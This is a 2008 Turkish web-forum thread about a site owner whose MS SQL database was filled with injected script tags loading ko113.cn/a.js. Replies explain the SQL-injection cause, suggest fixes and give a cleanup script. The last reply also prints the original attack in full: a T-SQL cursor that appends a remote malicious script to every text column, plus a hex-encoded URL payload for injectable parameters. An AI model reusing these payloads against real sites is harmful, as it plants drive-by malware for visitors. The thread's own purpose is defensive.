+ Yanıtla
Toplam 5 sonuçtan 1 ile 5 arası olanlar

Konu Başlığı: http://www.ko113.cn/a.js diye bir js ?

  1. 19.11.2008 19:50 #1
    Vtrbilisim
    Vtrbilisim şu an çevrimdışı
    Üye
    Katılım Tarihi
    29.10.2008
    Yer
    izmir
    Mesaj
    2

    http://www.ko113.cn/a.js diye bir js ?

    script src=http://www.ko113.cn/a.js MS SQL veritabanımdaki çoğu alana yerleşmiş bunun nedeni ne olabilir muhtemel kurtulma yolları nedir?
    Alıntı Yaparak Yanıtla Alıntı Yaparak Yanıtla
  2. 19.11.2008 23:31 #2
    fatihunal
    fatihunal şu an çevrimdışı
    Üye fatihunal's Avatar
    Katılım Tarihi
    14.06.2004
    Yer
    Ankara
    Yaş
    27
    Mesaj
    636

    re: http://www.ko113.cn/a.js diye bir js ?

    Alıntı Vtrbilisim tarafından gönderilen mesaj: Mesajı Göster
    script src=http://www.ko113.cn/a.js MS SQL veritabanımdaki çoğu alana yerleşmiş bunun nedeni ne olabilir muhtemel kurtulma yolları nedir?
    Sanırım, birisi veya birileri sitenizde bulunan formlarda JavaScript kodları çalıştırmayı (XSS) denemiş.
    Anlattığın kadarıyla da başarmış

    Kurtulma yolları SQL injection açıklarını bulmak kapatmak,
    XSS açıklarını bulmak ve kapatmak,
    Formlarda geçersiz karakter kullanımını önlemek,
    Captcha olaylarına önem vermek vb. gibi birçok şey yapabilirsiniz.
    Aza sormuşlar nereye gidiyorsun diye. Çoğun yanına demiş. :confused:
    Alıntı Yaparak Yanıtla Alıntı Yaparak Yanıtla
  3. 21.11.2008 20:53 #3
    Vtrbilisim
    Vtrbilisim şu an çevrimdışı
    Üye
    Katılım Tarihi
    29.10.2008
    Yer
    izmir
    Mesaj
    2

    Re: http://www.ko113.cn/a.js diye bir js ?

    SQL incejtion değil formlarada yapıştırmış olamaz çünkü vertibanında hiç formlarda kullanılmayan tblolarada bulaşmış ve ilginç olanı sitede link olan yerlere bulaşmış.O alanda yazılanlarında bir kısmı gitmiş.
    Alıntı Yaparak Yanıtla Alıntı Yaparak Yanıtla
  4. 21.11.2008 22:52 #4
    mrcha0s
    mrcha0s şu an çevrimdışı
    Üye mrcha0s's Avatar
    Katılım Tarihi
    25.07.2007
    Yer
    Moskova
    Yaş
    30
    Mesaj
    63

    Re: http://www.ko113.cn/a.js diye bir js ?

    Ben iki farkli sekilde bu tur bir virusle karsilastim. Birincisi Plesk kontrol panelinin bir acigini kullanan virusdu. Ikincisi ise fatihunalin dedigi gibi SQL injection ile bulasan bir virustu.
    dusk till dawn // Jazz Whiskey Cigar // over and overloaded again // coding... quaking...

    Minimal Code - Sayfalar.com
    Alıntı Yaparak Yanıtla Alıntı Yaparak Yanıtla
  5. 22.11.2008 16:06 #5
    energizer
    energizer şu an çevrimdışı
    Üye energizer's Avatar
    Katılım Tarihi
    23.04.2006
    Yer
    İstanbul
    Mesaj
    27

    Re: http://www.ko113.cn/a.js diye bir js ?

    Alıntı Vtrbilisim tarafından gönderilen mesaj: Mesajı Göster
    script src=http://www.ko113.cn/a.js MS SQL veritabanımdaki çoğu alana yerleşmiş bunun nedeni ne olabilir muhtemel kurtulma yolları nedir?
    Aşağıdaki kod ile veritabanını temizleyebilirsin.

    Kod:
    DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://www.ko113.cn/a.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
    Bu saldırılar sistemde yer alan SQL injection açıklarında yararlanılarak yapılıyor.

    ( Uyarı bu bir saldırı kodudur, ciddi verileriniz üzerinde denemeyin. )
    Kod:
    ;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.ko113.cn/a.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
    Aşağıdaki gibi çağrılabilir...

    Kod:
    www.example.com/...injectiona açık parametreler...;DeCLARE%20@S%20CHAR(4000);
SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));
ExEC(@S);
    Spina - Kurumsal Web ve Intranet Çözümleri
    www.spina.com.tr
    Alıntı Yaparak Yanıtla Alıntı Yaparak Yanıtla
+ Yanıtla
« Önceki Konu | Sonraki Konu »

Bu konu başlığı için etiketler

Mesaj Seçenekleri

  • Yeni başlık açamazsınız
  • Cevap yazabilirsiniz
  • Dosya ekleyemezsiniz
  • Mesajlarınızı değiştiremezsiniz

Forum Kuralları